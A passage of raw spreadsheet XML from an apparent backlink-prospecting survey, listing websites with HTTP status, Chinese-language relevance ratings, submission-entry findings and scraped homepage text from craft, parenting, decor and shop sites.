        <x:v>Lifetime Web Designs</x:v>
      </x:c>
      <x:c r="J520" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K520" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L520" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M520" s="19" t="str">
        <x:v>https://lifetimewebdesigns.com/</x:v>
      </x:c>
      <x:c r="N520" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O520" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P520" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q520" s="21" t="str">
        <x:v>Discover our great selection of Dish Racks. Over 2400 Dish Racks Great Selection Price Lifetime Web Designs Skip to content Search Lifetime Web Designs Menu Home Catalog Blog FAQ Save Liquid error (snippets/product-grid-item line 58): divided by 0% WENKO Corner Dish Rack Regular price $72.99 Save Liquid error (snippets/product-grid-item line 58): divided by 0% SMIO 2-Tier Stainless Steel Dish Rack Dish Drainer with Chopstick Holder Regular price $79.99 Save Liquid error (snippets/product-grid-item line 58): divided by 0% SMIO 2-Tier Stainless Steel Dish Rack Dish Drainer with Chopstick Holder Regular price $89.99 Save Liquid error (snippets/product-grid-item line 58): divided by 0% SMIO 2-Tier Dish Rack - 304 Stainless Steel Dish Drying Rack with Drainboard Regular price $59.9</x:v>
      </x:c>
      <x:c r="R520" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S520" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T520" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://lifetimewebdesigns.com</x:v>
      </x:c>
    </x:row>
    <x:row r="521">
      <x:c r="A521" s="18" t="str">
        <x:v>520</x:v>
      </x:c>
      <x:c r="B521" s="19" t="str">
        <x:v>ddecoraty.com</x:v>
      </x:c>
      <x:c r="C521" s="19" t="str">
        <x:v>https://ddecoraty.com</x:v>
      </x:c>
      <x:c r="D521" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E521" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F521" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G521" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H521" s="19" t="str">
        <x:v>https://ddecoraty.com/</x:v>
      </x:c>
      <x:c r="I521" s="19" t="str">
        <x:v>Decor-Ddecoraty - decor and décor-Ddecoraty-Decor (short for decoration) refers to movable, ornamental items used to beautify and personalize interior spaces. Popular types include furniture, textiles (pillows, curtains), lighting, art, mirrors, rugs, and greenery. Key styles often include modern, m</x:v>
      </x:c>
      <x:c r="J521" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K521" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L521" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M521" s="19" t="str">
        <x:v>https://ddecoraty.com/</x:v>
      </x:c>
      <x:c r="N521" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O521" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P521" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q521" s="21" t="str">
        <x:v>decor and décor-Ddecoraty-Decor (short for decoration) refers to movable, ornamental items used to beautify and personalize interior spaces. Popular types include furniture, textiles (pillows, curtains), lighting, art, mirrors, rugs, and greenery. Key styles often include modern, minimalist, traditional, industrial, and bohemian, aiming to improve aesthetics and functionality Decor-Ddecoraty - decor and décor-Ddecoraty-Decor (short for decoration) refers to movable, ornamental items used to beautify and personalize interior spaces. Popular types include furniture, textiles (pillows, curtains), lighting, art, mirrors, rugs, and greenery. Key styles often include modern, minimalist, traditional, industrial, and bohemian, aiming to improve aesthetics and functionality Home DIY Interior Design Furniture Home decor SUBSCRIBE Search Tuesday, September 1, 2026 SUBSCRIBE DIY Interior Design Furniture Home decor Search Search DIY Interior Design Furniture Home decor All Right Reserved. Designed and Developed by PenciDesign DIY Home Decor Spring Inexperienced &amp; Blue Adorni</x:v>
      </x:c>
      <x:c r="R521" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S521" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T521" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://ddecoraty.com</x:v>
      </x:c>
    </x:row>
    <x:row r="522">
      <x:c r="A522" s="18" t="str">
        <x:v>521</x:v>
      </x:c>
      <x:c r="B522" s="19" t="str">
        <x:v>backyardsummercamp.com</x:v>
      </x:c>
      <x:c r="C522" s="19" t="str">
        <x:v>https://backyardsummercamp.com</x:v>
      </x:c>
      <x:c r="D522" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E522" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F522" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G522" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H522" s="19" t="str">
        <x:v>https://backyardsummercamp.com/</x:v>
      </x:c>
      <x:c r="I522" s="19" t="str">
        <x:v>Home - Backyard Summer Camp</x:v>
      </x:c>
      <x:c r="J522" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K522" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L522" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M522" s="19" t="str">
        <x:v>https://backyardsummercamp.com/</x:v>
      </x:c>
      <x:c r="N522" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O522" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P522" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q522" s="21" t="str">
        <x:v>Backyard Summer Camp is a family blog that helps you plan the best summer ever in your own backyard with play ideas, crafts, and learning fun. Home - Backyard Summer Camp Skip to primary navigation Skip to main content Skip to footer Home Themes Pirate Ocean Space Dinosaur Nature Subscribe Shop About Backyard Summer Camp Have the best summer ever in your own backyard! Browse by Summer Camp Theme Pirate Camp Ocean Camp space camp dinosaur camp nature camp Welcome to Backyard Summer Camp! We believe that you can have the best summer ever in your own backyard. Here you’ll find tons of simple crafts , play ideas , and fun learning resources for kids of all ages. Backyard Summer Camp is your go-to resource for planning and organizing fun kids’ activities for all 104 days of summer. start here In the Shop Pirate Activity Bundle Ocean Act</x:v>
      </x:c>
      <x:c r="R522" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S522" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T522" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://backyardsummercamp.com</x:v>
      </x:c>
    </x:row>
    <x:row r="523">
      <x:c r="A523" s="18" t="str">
        <x:v>522</x:v>
      </x:c>
      <x:c r="B523" s="19" t="str">
        <x:v>evimveailem.com</x:v>
      </x:c>
      <x:c r="C523" s="19" t="str">
        <x:v>https://evimveailem.com</x:v>
      </x:c>
      <x:c r="D523" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E523" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F523" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G523" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H523" s="19" t="str">
        <x:v>https://www.evimveailem.com/</x:v>
      </x:c>
      <x:c r="I523" s="19" t="str">
        <x:v>Evim ve Ailem - Güzel Evim Canım Ailem Benim</x:v>
      </x:c>
      <x:c r="J523" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K523" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L523" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M523" s="19" t="str">
        <x:v>https://www.evimveailem.com/</x:v>
      </x:c>
      <x:c r="N523" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O523" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P523" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q523" s="21" t="str">
        <x:v>Güzel Evim Canım Ailem Benim Evim ve Ailem - Güzel Evim Canım Ailem Benim Skip to content Arama: Anasayfa Ailem Anne&amp;Baba Evlilik Hamilelik Doğum Bebek Çocuk 3-6 yaş 7-12 yaş Oyun ve Oyuncak Akıl Oyunları Etkinlik&amp;Faaliyet Genç Meslek tercihi Üniversite tercihi Aile Psikolojisi ve Eğitimi Aile Ekonomisi Aile Sağlığı Değerler Eğitimi Ramazan Günlüğüm Ramazan Günlüğüm Eğitim Özel Eğitim Üstün Zekâ Yabancı Dil Eğitim Bursu Yurtdışında Eğitim İş&amp;Kariyer Staj Girişimcilik Kadın Girişimciler Kültür&amp;Sanat Kitap Çocuk Kitabı Genç Kitabı Yetişkin Yazar Film Çocuk Filmi Aile Filmi Kült Film Kısa Film Yönetmen Animasyon Yabancı Dizi Fotoğraf Haftanın Fotoğrafları Tiyatro Müzik Galeri Çizim Evim Yemek Küçük Şefler Yemek Tarifleri T</x:v>
      </x:c>
      <x:c r="R523" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S523" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T523" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://evimveailem.com</x:v>
      </x:c>
    </x:row>
    <x:row r="524">
      <x:c r="A524" s="18" t="str">
        <x:v>523</x:v>
      </x:c>
      <x:c r="B524" s="19" t="str">
        <x:v>gwynsfoxynest.com</x:v>
      </x:c>
      <x:c r="C524" s="19" t="str">
        <x:v>https://gwynsfoxynest.com</x:v>
      </x:c>
      <x:c r="D524" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E524" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F524" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G524" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H524" s="19" t="str">
        <x:v>https://gwynsfoxynest.com/</x:v>
      </x:c>
      <x:c r="I524" s="19" t="str">
        <x:v>Home : Gwyn's Foxy Nest DIY Crafts You Can Do At Home</x:v>
      </x:c>
      <x:c r="J524" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K524" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L524" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M524" s="19" t="str">
        <x:v>https://gwynsfoxynest.com/</x:v>
      </x:c>
      <x:c r="N524" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O524" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P524" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q524" s="21" t="str">
        <x:v>Home : Gwyn's Foxy Nest DIY Crafts You Can Do At Home Skip to content Gwyn's Foxy Nest - Let's Make Crafting Fun Again! DIY Crafts Stencil Art Chalk Couture Stencils Chalk Paste Chalk Couture Ink Chalk Couture Digital Files Chalk Couture Cutouts Chalk Couture FAQs Easy Bow Making Color Palette Food and Drink Ideas Lego Painted Furniture Annie Sloan Painting Technique Paper Crafts Party Baby Shower Birthday Tiered Tray Decor Book Recommendations Oprahs Book Club Printables Coloring Pages For Adults Gift Tags Wall Art Word Search Shop Gwyn's Foxy Nest DIY Crafts You Can Do At Home DIY Crafts, Hobbies And Home Decor Inspiration DIY Crafts, Hobbies And Home Decor Inspiration Gwyn’s Foxy Nest DIY</x:v>
      </x:c>
      <x:c r="R524" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S524" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T524" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://gwynsfoxynest.com</x:v>
      </x:c>
    </x:row>
    <x:row r="525">
      <x:c r="A525" s="18" t="str">
        <x:v>524</x:v>
      </x:c>
      <x:c r="B525" s="19" t="str">
        <x:v>compuhardware.com.mx</x:v>
      </x:c>
      <x:c r="C525" s="19" t="str">
        <x:v>https://compuhardware.com.mx</x:v>
      </x:c>
      <x:c r="D525" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E525" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F525" s="20" t="str">
        <x:v>500</x:v>
      </x:c>
      <x:c r="G525" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H525" s="19" t="str">
        <x:v>https://www.compuhardware.net/</x:v>
      </x:c>
      <x:c r="I525" s="19" t="str">
        <x:v>WordPress &amp;rsaquo; Error</x:v>
      </x:c>
      <x:c r="J525" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K525" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L525" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M525" s="19" t="str">
        <x:v>https://www.compuhardware.net/</x:v>
      </x:c>
      <x:c r="N525" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O525" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P525" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q525" s="21" t="str">
        <x:v>WordPress &amp;rsaquo; Error Ha habido un error crítico en esta web. Más información sobre la solución de problemas de WordPress.</x:v>
      </x:c>
      <x:c r="R525" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S525" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T525" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://compuhardware.com.mx
http://compuhardware.com.mx</x:v>
      </x:c>
    </x:row>
    <x:row r="526">
      <x:c r="A526" s="18" t="str">
        <x:v>525</x:v>
      </x:c>
      <x:c r="B526" s="19" t="str">
        <x:v>gypsyplate.com</x:v>
      </x:c>
      <x:c r="C526" s="19" t="str">
        <x:v>https://gypsyplate.com</x:v>
      </x:c>
      <x:c r="D526" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E526" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F526" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G526" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H526" s="19" t="str">
        <x:v>https://gypsyplate.com/</x:v>
      </x:c>
      <x:c r="I526" s="19" t="str">
        <x:v>Security Verification</x:v>
      </x:c>
      <x:c r="J526" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K526" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L526" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M526" s="19" t="str">
        <x:v>https://gypsyplate.com/</x:v>
      </x:c>
      <x:c r="N526" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O526" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P526" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q526"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a349baaaadbad5c8 Client IP: 61.211.1.60 Open Support Ticket Please include these details when opening a support ticket so we can quickly locate the challenged request.</x:v>
      </x:c>
      <x:c r="R526" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S526" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T526" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://gypsyplate.com</x:v>
      </x:c>
    </x:row>
    <x:row r="527">
      <x:c r="A527" s="18" t="str">
        <x:v>526</x:v>
      </x:c>
      <x:c r="B527" s="19" t="str">
        <x:v>losbragas.com.br</x:v>
      </x:c>
      <x:c r="C527" s="19" t="str">
        <x:v>https://losbragas.com.br</x:v>
      </x:c>
      <x:c r="D527" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E527" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F527" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G527" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H527" s="19" t="str">
        <x:v>http://losbragas.com.br/</x:v>
      </x:c>
      <x:c r="I527" s="19" t="str">
        <x:v>LB - ENTERTAINMENT</x:v>
      </x:c>
      <x:c r="J527" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K527" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L527" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M527" s="19" t="str">
        <x:v>http://losbragas.com.br/</x:v>
      </x:c>
      <x:c r="N527" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O527" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P527" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q527" s="21" t="str">
        <x:v>LB - ENTERTAINMENT contato@losbragas.com.br | +55 11 3031-8377 | Rua Turi,70 - São Paulo / SP - 05443-050 AN INTELLECTUAL PROPERTY DEVELOPMENT COMPANY Home Reel Creative Development Brand Showrunning® Bio Home Reel Creative Development Brand Showrunning® Bio contato@losbragas.com.br | +55 11 3031-8377 | Rua Turi, 70 - São Paulo / SP - 05443-050</x:v>
      </x:c>
      <x:c r="R527" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S527" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T527" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://losbragas.com.br
http://losbragas.com.br</x:v>
      </x:c>
    </x:row>
    <x:row r="528">
      <x:c r="A528" s="18" t="str">
        <x:v>527</x:v>
      </x:c>
      <x:c r="B528" s="19" t="str">
        <x:v>bleutria.com</x:v>
      </x:c>
      <x:c r="C528" s="19" t="str">
        <x:v>https://bleutria.com</x:v>
      </x:c>
      <x:c r="D528" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E528" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F528" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G528" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H528" s="19" t="str">
        <x:v>http://www.bleutria.com/</x:v>
      </x:c>
      <x:c r="I528" s="19" t="str"/>
      <x:c r="J528" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K528" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L528" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M528" s="19" t="str">
        <x:v>http://www.bleutria.com/</x:v>
      </x:c>
      <x:c r="N528" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O528" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P528" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q528" s="21" t="str">
        <x:v>Responsive Menu Search Apparel Duncan Crew Japan Duncan Toys Freehand Freehand Remix JYCC SAVE DETH Shibuya Yo-Yo Club SpinGear TWENTY-SEVEN Yo-Yo Yo-Yo Competition YoYoIsland YoYoJam Copyright &amp;copy; 2026 | Theme by: Theme Horse | Proudly Powered by: WordPress</x:v>
      </x:c>
      <x:c r="R528" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S528" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T528" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://bleutria.com
http://bleutria.com</x:v>
      </x:c>
    </x:row>
    <x:row r="529">
      <x:c r="A529" s="18" t="str">
        <x:v>528</x:v>
      </x:c>
      <x:c r="B529" s="19" t="str">
        <x:v>cacoastfoa.com</x:v>
      </x:c>
      <x:c r="C529" s="19" t="str">
        <x:v>https://cacoastfoa.com</x:v>
      </x:c>
      <x:c r="D529" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E529" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F529" s="20"/>
      <x:c r="G529" s="19" t="str">
        <x:v>超时</x:v>
      </x:c>
      <x:c r="H529" s="19" t="str"/>
      <x:c r="I529" s="19" t="str"/>
      <x:c r="J529" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K529" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L529" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M529" s="19" t="str">
        <x:v>https://cacoastfoa.com</x:v>
      </x:c>
      <x:c r="N529" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O529" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P529" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q529" s="21" t="str"/>
      <x:c r="R529" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S529" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T529" s="21" t="str">
        <x:v>timeout | timeout | 请求: https://cacoastfoa.com
http://cacoastfoa.com</x:v>
      </x:c>
    </x:row>
    <x:row r="530">
      <x:c r="A530" s="18" t="str">
        <x:v>529</x:v>
      </x:c>
      <x:c r="B530" s="19" t="str">
        <x:v>healthywealthyvida.com</x:v>
      </x:c>
      <x:c r="C530" s="19" t="str">
        <x:v>https://healthywealthyvida.com</x:v>
      </x:c>
      <x:c r="D530" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E530" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F530" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G530" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H530" s="19" t="str">
        <x:v>https://healthywealthyvida.com/</x:v>
      </x:c>
      <x:c r="I530" s="19" t="str">
        <x:v>Healthy Wealthy Vida - Your Life, Your Health, Your Wealth</x:v>
      </x:c>
      <x:c r="J530" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K530" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L530" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M530" s="19" t="str">
        <x:v>https://healthywealthyvida.com/</x:v>
      </x:c>
      <x:c r="N530" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O530" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P530" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q530" s="21" t="str">
        <x:v>Your Life, Your Health, Your Wealth Healthy Wealthy Vida - Your Life, Your Health, Your Wealth Skip to content Home Parenting Parenting Pregnancy and Birth Health Recipes Wealth Home Life Contact About Privacy Policy Recipes The Best Instant Pot Vegetarian Lasagna Soup By Emra August 28, 2026 August 28, 2026 There’s something magical about lasagna without the layering. All those cozy flavors bubbling tomato sauce, garlicky herbs, melty cheese, tender noodles but in a spoonable, no-fuss form that comes together in one pot in well under an hour. This version skips the meat entirely and leans into mushrooms, zucchini, and spinach for texture and heartiness,… Read More The Best Instant Pot Vegetarian Lasagna Soup Parenting 9 Easy </x:v>
      </x:c>
      <x:c r="R530" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S530" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T530" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://healthywealthyvida.com</x:v>
      </x:c>
    </x:row>
    <x:row r="531">
      <x:c r="A531" s="18" t="str">
        <x:v>530</x:v>
      </x:c>
      <x:c r="B531" s="19" t="str">
        <x:v>artsycraftsymom.com</x:v>
      </x:c>
      <x:c r="C531" s="19" t="str">
        <x:v>https://artsycraftsymom.com</x:v>
      </x:c>
      <x:c r="D531" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E531" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F531" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G531" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H531" s="19" t="str">
        <x:v>https://artsycraftsymom.com/</x:v>
      </x:c>
      <x:c r="I531" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J531" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K531" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L531" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M531" s="19" t="str">
        <x:v>https://artsycraftsymom.com/</x:v>
      </x:c>
      <x:c r="N531" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O531" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P531" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q531" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R531" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S531" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T531" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://artsycraftsymom.com</x:v>
      </x:c>
    </x:row>
    <x:row r="532">
      <x:c r="A532" s="18" t="str">
        <x:v>531</x:v>
      </x:c>
      <x:c r="B532" s="19" t="str">
        <x:v>activity-mom.com</x:v>
      </x:c>
      <x:c r="C532" s="19" t="str">
        <x:v>https://activity-mom.com</x:v>
      </x:c>
      <x:c r="D532" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E532" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F532" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G532" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H532" s="19" t="str">
        <x:v>https://activity-mom.com/</x:v>
      </x:c>
      <x:c r="I532" s="19" t="str">
        <x:v>The Activity Mom - Sharing Kids Activities and Activity Ideas that Make Learning Fun for Kids of All Ages</x:v>
      </x:c>
      <x:c r="J532" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K532" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L532" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M532" s="19" t="str">
        <x:v>https://activity-mom.com/</x:v>
      </x:c>
      <x:c r="N532" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O532" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P532" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q532" s="21" t="str">
        <x:v>Sharing Activities and Ideas to Make Learning Fun The Activity Mom - Sharing Kids Activities and Activity Ideas that Make Learning Fun for Kids of All Ages Skip to Content Search Search for: Close Search &amp;times; Home About Holiday Activities How to Draw a Bald Eagle for Kids Free Printable Learning how to draw a bald eagle is a fun way for kids to practice drawing animals while learning about one of the most recognizable birds in North America. With its white head, strong yellow beak, brown wings, and powerful feet, the bald eagle is a truly majestic bird and an exciting subject for young &amp;hellip; Read More about How to Draw a Bald Eagle for Kids Free Printable How to Draw an Alligator for Kids Free Printable Learning how to draw an alligat</x:v>
      </x:c>
      <x:c r="R532" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S532" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T532" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://activity-mom.com</x:v>
      </x:c>
    </x:row>
    <x:row r="533">
